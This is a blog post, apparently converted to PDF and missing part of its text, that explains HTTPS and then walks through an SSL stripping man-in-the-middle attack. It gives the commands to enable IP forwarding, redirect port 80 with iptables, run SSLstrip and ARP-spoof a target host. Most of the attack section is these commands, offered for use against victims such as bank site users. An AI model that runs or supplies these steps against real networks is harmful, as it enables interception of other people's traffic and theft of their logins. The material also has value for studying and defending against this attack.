Documente Academic
Documente Profesional
Documente Cultură
Username
Password
| Forgot Password?
Contact
open in browser PRO version
pdfcrowd.com
Email:
raj@securitybuzz.net
Phone: 1.972.510.5912
Subscribe me
Email:
Send
What is SSL?
Secure Socket Layer (SSL) is a secured network protocol that provides
communications between computers using proper encryption so that no one
can intercept the communication by just eavesdropping on the channel. So it
makes communication secure , hence you will find critical sites like your
banking site , Gmail ,Facebook make use of this SSL channel i.e. (https) .
Https is a secure channel (SSL protocol) of http. The ultimate goal is to create
secure channels over insecure networks.
How HTTPS communication takes place between Client and Server?
HTTPS ensures the client that visited site is trustworthy. Now consider client
wants to connect to its bank site ABCbank which ensures HTTPS connection.
So clients browser goes through following steps.
1. The client browser connects to http://ABCbank.com on port 80 using
2.
3.
4.
5.
6.
7.
HTTP.
The server redirects the client HTTPS version of this site using an HTTP
code 302 redirect.
The client connects to https://ABCbank.com on port 443.
The server provides a certificate to the client containing its digital
signature. This certificate is used to verify the identity of the site.
The client takes this certificate and verifies it against its list of trusted
certificate authorities.
Once verification is completed, secure communication channel bridges
between server and client.
If client could not find the certificate amongst the list of trusted one ,
certificate validation error will be presented and you will be asked to
either stay off from this untrusted site or if you still trust the source of the
pdfcrowd.com
site , you can Add Exception and proceed at your own risk.
changes.
3. The attacking machine supplies certificates to the web server and
impersonates the client.
4. Traffic is received back from the secure website and provided back to
the client.
IS THERE ANY VISIBLE DIFFERENCE AT SERVER SIDE OR CLIENT
SIDE WHEN ATTACK IS PERFORMED?
This attack tricks the server to believe that an attacker machine is itself the
client. Well, it works quiet well for the server because as far as server is
concerned it is still receiving SSL traffic it wants from attackers machine. Thus
server wont see any difference when attack is performed.
open in browser PRO version
pdfcrowd.com
The difference could be judged only at client side because now the URL at
client side wont be HTTPS instead it will receive HTTP communication
channel which is coming from attackers machine and not from server directly
.Hence an alert user might get an alarm from the URL that something is fishy .
To perform this attack you need SSLstrip which can be download from here . It
only runs on Linux system another option is to download Backtrack5 which has
SSLstrip preinstalled in it.
Steps to Attack
I am using Backtrack Linux to perform this attack. Open the shell and type the
command.
Echo 1 > > /proc/sys/net/ipv4/ip_forward
Using this command we are configuring it for IP forwarding.
Fig: Enabling IP Forwarding
Next step is to modify the IPtables Firewall configuration. For this we need to
intercept all HTTP traffic and route it back to the port on which SSLstrip is
ready to listen. Command is as below
IPtables -t nat -A PREROUTING -p tcp destination-port 80 -j REDIRECT toport <listenPort>
Here you need to specify Port of your choice in place of <listenPort> in above
command
Fig: Configuring IPtables to properly route HTTP traffic
open in browser PRO version
pdfcrowd.com
Next step is to let SSLstrip listen on the port specified in the above command.
Command is as below
SSLstrip -l <listenPort>
Fig: Using SSLstrip
The last step in this process is to configure ARP spoofing to intercept the
traffic of the target host.
Arpspoof -i <interface> -t <targetIP> <gatewayIP>
Fig: Configuring ARP Spoofing
pdfcrowd.com
pdfcrowd.com
0 Comments
hackingdemystified
Sort by Best
ALSO ON HACKINGDEMYSTIFIED
PList
SSH LOGIN
Subscribe
Privacy
pdfcrowd.com
Back to top
pdfcrowd.com